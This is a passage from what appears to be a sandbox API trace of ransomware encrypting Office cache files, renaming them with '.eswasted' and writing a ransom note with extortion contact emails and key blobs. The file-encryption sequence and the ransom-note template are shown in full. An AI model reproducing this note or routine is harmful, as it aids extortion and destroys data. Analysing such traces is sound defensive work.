dwFlags=0x0) returned 1 [0071.586] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x1312990 [0071.586] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0071.586] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0071.586] _snwprintf (in: _Dest=0x1412050, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ns49t6G1L7lXi5FuOwUbDOqHt+5W2xiL+D3b4EMasRuOLLzsGmFlkCvn00i+PqQr\r\nRVFeEd7+hh/kF4Zz2132UeuntyFt3NDyx+koIKHBcUYiT9YtefZQ8q2hhCYU2yxN\r\nsOlR2qdl2VRVbEdVFIdecBhns9Hx+3DqQdowkSAefNYw/NC2GIn4BvfjhUh4yMaz\r\nE3b0Dfrqqssz1uBoQ3QHvtPViBOShEiWZZgmbQ91ljPb995aDfkbE8OcYXV0hDZu\r\nN68WrtY5DEYZIBXrhRNo65rJAYBXzSDEhhIFI/ttyt5B0u8kB/Nbb6+dyt9mCI8a\r\n/NmNUB6fUS6WT6qxeBxYbvU0cvSD1Q6fOFPnew1pHrGriN6zmwDXzNwwiGcEQOEP\r\n6BksQ1H5ZPLGWWT8BuoleNqdtpId5ej1TPzKGd+56sgx6Ai77NjIniGR/FP750O1\r\nh/2+PJHAEBTkUPNTcb1wbIayoVo53El9UvC12KA2gAXNZnrqjR0Bz/730LOSVZYO\r\n8Fk+SPZMrQVNUhv5nruWIAj0DEZF82U0i2SdYSH9pF/YYD19oMxiWkzN+X4s5vqw\r\neZ1Nbjn9KpU0h2hgN6LrGcBf/DAXRK8RHo3mZreg56FsNfyMYHLqN1zAZLwFLvF7\r\nuJ2L6UJoq1pdFONmWctbhxZ9MERECFW0Y8gYUQSNhEK=[end_key]\r\nKEEP IT\r\n") returned 990 [0071.586] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312990 | out: hHeap=0x6d0000) returned 1 [0071.586] WriteFile (in: hFile=0x11c, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0071.586] SetEndOfFile (hFile=0x11c) returned 1 [0071.588] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.588] CloseHandle (hObject=0x11c) returned 1 [0071.590] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b630 | out: hHeap=0x6d0000) returned 1 [0071.590] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c358 | out: hHeap=0x6d0000) returned 1 [0071.590] _aulldvrm () returned 0x0 [0071.590] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.591] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.591] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.591] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0071.591] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x70b3c8 [0071.591] lstrcpyW (in: lpString1=0x70b460, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.591] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0071.591] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.592] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0071.592] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.592] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.592] WriteFile (in: hFile=0x11c, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.593] SetEndOfFile (hFile=0x11c) returned 1 [0071.593] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.593] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.593] lstrcpyW (in: lpString1=0x70b460, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.594] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0071.595] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0071.595] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0071.595] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x750 [0071.595] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x330000 [0071.595] CloseHandle (hObject=0x128) returned 1 [0071.597] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0071.598] CloseHandle (hObject=0x124) returned 1 [0071.598] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0071.598] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.598] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.598] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.599] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.599] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.599] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.610] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x1312990 [0071.610] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0071.610] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0071.610] _snwprintf (in: _Dest=0x1412050, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]rTI5/H9AuIhLfu+Qi6mwttz6+Ag/DtDBDVJ4yKarkCGcTxoKvZ/sod4WkpWNBp22\r\n/gL5qpzaFohUcMsckX00F16GD7QbD8VfSp8LSF/SeApW2JSES/3IS1forop9Zu23\r\nq6JmPNjqGwb+6lCXD0Zb8hlWtStX+IuLAoKNs5JK9Cwjl5fXLHnJNL8p/s4AKOXD\r\nnNjizuXoEEXJIAX6bVbH2lKCMBnOJ1MZFV9DN29hJEGZAgZFqAWjowrzjbzyE4bJ\r\nW0gBsztKMYUIaZezKz6wyuQumj8IQuaAvl5OOmevJ10P6x7uQ4+hrcWzbcMZzLaN\r\n5jX64/hVRFDR1i5kbEg7CAXfmWzGgeKMJZE8SUJnxznwxwhUifrkMvMW8qpMxmPc\r\nMZSQiWAj1w3nAkKwqnIi8y3ROsCMSucTS6bn4Wy2STN5TNLtq9PDiwqLJB7s5acm\r\nZfGCSWOJynQdFCUvS0mKKh+CzZuoQya2iZqiBLf8wpik5SAeDyyM1SHNsr/cP6ss\r\nhGA2FutwYEXaghdW6SixR1iFMqutFNOO19yTHGZl8MKMDZ7t+wqKbyXkswN8DIOB\r\nlt4miV3npSqPAdvH2Dwja7uqMub7Rh8WeqOpGTE4LKNBSTPEzHqXOStM7nieeI1O\r\nluOA+itVqg53J1QIgd4uhalGtS7qyoTC0FkN44qEwYy=[end_key]\r\nKEEP IT\r\n") returned 990 [0071.610] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312990 | out: hHeap=0x6d0000) returned 1 [0071.610] WriteFile (in: hFile=0x11c, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0071.611] SetEndOfFile (hFile=0x11c) returned 1 [0071.613] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.613] CloseHandle (hObject=0x11c) returned 1 [0071.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3c8 | out: hHeap=0x6d0000) returned 1 [0071.614] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0071.614] _aulldvrm () returned 0x0 [0071.614] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.615] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.615] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.615] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 80 [0071.615] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2aa) returned 0x70b3c8 [0071.615] lstrcpyW (in: lpString1=0x70b468, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.615] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0071.615] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.616] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0071.616] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.616] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.617] WriteFile (in: hFile=0x11c, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.618] SetEndOfFile (hFile=0x11c) returned 1 [0071.618] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.618] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.618] lstrcpyW (in: lpString1=0x70b468, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.618] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.eswasted")) returned 1 [0071.625] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0071.625] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0071.625] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x391 [0071.625] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x391) returned 0x330000 [0071.625] CloseHandle (hObject=0x124) returned 1 [0071.627] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0071.627] CloseHandle (hObject=0x128) returned 1 [0071.628] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0071.628] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.628] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.628] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.628] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.629] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.629] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.639] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x1312990 [0071.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0071.639] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0071.639] _snwprintf (in: _Dest=0x1412050, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]gl13GPo8pMmUCzUKJiLITojWgvASIDFQuXbPXWR6Yo8grkBJ3c+O2hdxiGItH1u0\r\noPt+Yq9S2Zi8+n/5NqtZsbI6urGiBRLUvHT1c0GIuRNHu4bwbWi4hfUG61EKQg6N\r\nMtXL190X/qtFnznaBDYcaBRGep/V1tursFW8xXiV94Rmj/J4B55NdI1YIMS1sWfh\r\nnrma+fSPXsi0dZnprrbDmmmlM3vpg/qLCCavJbYBMdWAMwgRoQhGm0XyFaBIrlOb\r\nTda/zkv9a2Oo3ttsMcZsfhvD3ubTA17aVdju+8QuJQYaNCm1hS2BwIrSHoiX+teF\r\nhAaXAeeOe77GvCjFzpOzvTLMUuxiDFUEgAqSHNlW0PUDGIWODuwg1vt2U2xoVGZP\r\njFxBXglfrLCmIok7ul7FdpMEjlQzw3RUg3UMYwhg1Pw8qvwHeJ2avz1ODsxt1/PT\r\nUXxls5ZlVpghb2xmaSAlIsGg1gVZtZaa9KftAQqxdz6WvYXNHPlJHMqOub0k03fY\r\nADT25u4g6V8GxOX/Jh1w68xhN7V09L3LtSPjEVmeYfYqH4fAQnCRbiV3DXb3jjh7\r\nbSUHX5EY2WGgiI2Hr7VW8mTaVTnfrkTS4Cbkf9PZ901XBJGV9/DJswjjbzAUSyA3\r\nKvgdQtHe0zdI/CeM7uRZKcQ4HiROCxIxzUjhf7ABXpk=[end_key]\r\nKEEP IT\r\n") returned 990 [0071.639] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312990 | out: hHeap=0x6d0000) returned 1 [0071.639] WriteFile (in: hFile=0x11c, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x130fef8, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0071.639] SetEndOfFile (hFile=0x11c) returned 1 [0071.641] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.641] CloseHandle (hObject=0x11c) returned 1 [0071.642] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3c8 | out: hHeap=0x6d0000) returned 1 [0071.642] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c458 | out: hHeap=0x6d0000) returned 1 [0071.643] _aulldvrm () returned 0x0 [0071.643] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.643] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.643] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.643] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0071.643] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x70b3c8 [0071.643] lstrcpyW (in: lpString1=0x70b460, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.644] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0071.644] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.644] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0071.644] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.644] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.645] WriteFile (in: hFile=0x11c, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.646] SetEndOfFile (hFile=0x11c) returned 1 [0071.646] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.646] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0071.646] lstrcpyW (in: lpString1=0x70b460, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.646] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0071.647] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0071.647] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0071.647] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x5ac [0071.647] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ac) returned 0x330000 [0071.647] CloseHandle (hObject=0x128) returned 1 [0071.654] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0071.654] CloseHandle (hObject=0x124) returned 1 [0071.654] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x711058 [0071.654] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.655] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.655] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.655] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.655] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.658] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.666] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x403) returned 0x1412050 [0071.666] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711058 | out: hHeap=0x6d0000) returned 1 [0071.666] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412460 [0071.666] _snwprintf (in: _Dest=0x1412460, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 